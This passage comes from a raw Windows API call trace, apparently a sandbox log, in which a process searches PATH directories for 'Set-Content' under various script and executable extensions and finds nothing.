ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0168.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.555] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.555] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Set-Content.VBE" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\set-content.vbe"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.555] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.556] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0168.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.556] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.556] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Set-Content.JS" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\set-content.js"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.556] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.556] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0168.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.557] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.557] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Set-Content.JSE" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\set-content.jse"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.557] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.557] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0168.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.557] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.558] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Set-Content.WSF" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\set-content.wsf"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.558] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.558] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.558] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0168.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.558] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.558] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.558] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Set-Content.WSH" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\set-content.wsh"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.559] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.559] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0168.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.559] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.559] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Set-Content.MSC" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\set-content.msc"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.560] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.560] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0168.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.560] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.560] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Set-Content.CPL" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\set-content.cpl"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.561] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.561] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.561] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0168.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.561] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.561] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.561] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Set-Content" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\set-content"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.561] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.562] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0168.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.562] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-Content.ps1" (normalized: "c:\\windows\\system32\\set-content.ps1"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.562] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0168.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.563] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-Content.psm1" (normalized: "c:\\windows\\system32\\set-content.psm1"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.563] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0168.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.564] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-Content.psd1" (normalized: "c:\\windows\\system32\\set-content.psd1"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.564] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0168.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.564] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-Content.COM" (normalized: "c:\\windows\\system32\\set-content.com"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.566] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0168.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.566] GetFullPathNameW (in: 